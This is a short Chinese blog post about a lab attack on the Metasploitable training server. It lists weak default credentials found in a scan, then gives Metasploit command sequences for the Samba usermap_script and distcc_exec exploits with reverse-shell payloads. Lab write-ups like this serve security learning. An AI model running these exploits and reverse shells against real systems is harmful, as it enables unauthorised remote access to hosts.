温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Samba&distcc 漏洞

发布时间:2020-05-27 16:57:09 来源:网络 阅读:1039 作者:GeForever 栏目:安全技术

漏洞测试确实是可以的  当时把文章copy下来进行再进行测试。但是没有copy到图片,实验是成功了,但是没有那么直观。

使用metasploit

对metasploitable 靶服务器进行***

metasploitable 是ubuntu8.0的版本

 

neuss扫描到漏洞

139端口可以获取该系统主机名为“METASPLOITABLE”,注释“metasploitable server (Samba 3.0.20-Debian)”;

系统存在弱口令,用户user、msfadmin密码与用户名一样,使用net use命令能够建立连接查看共享资源。ftp开放版本信息 ProFTPD 1.3.1 Server (Debian),user这个用户在ftp中也可以使用;

telnet服务开放,可确定该系统为Ubuntu 8.04,用户user、msfadmin可以登录,并获得相应权限。如果不存在弱口令,通过截获该telnet数据也能获取用户口令

一个distcc漏洞

一个samba 共享服务漏洞

 

 

msf对靶服务器的工具

smb-samba 共享服务

 

use exploit/multi/samba/usermap_script

set payload cmd/unix/reverse

set rhost (ip address)

set lhost (ip address)

exploit

 

use exploit/unix/misc/distcc_exec

set payload cmd/unix/reverse_perl

set rhost  (ip address)

set lhost  (ip address)

exploit

 

distcc 成功 但是没有root的权限

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI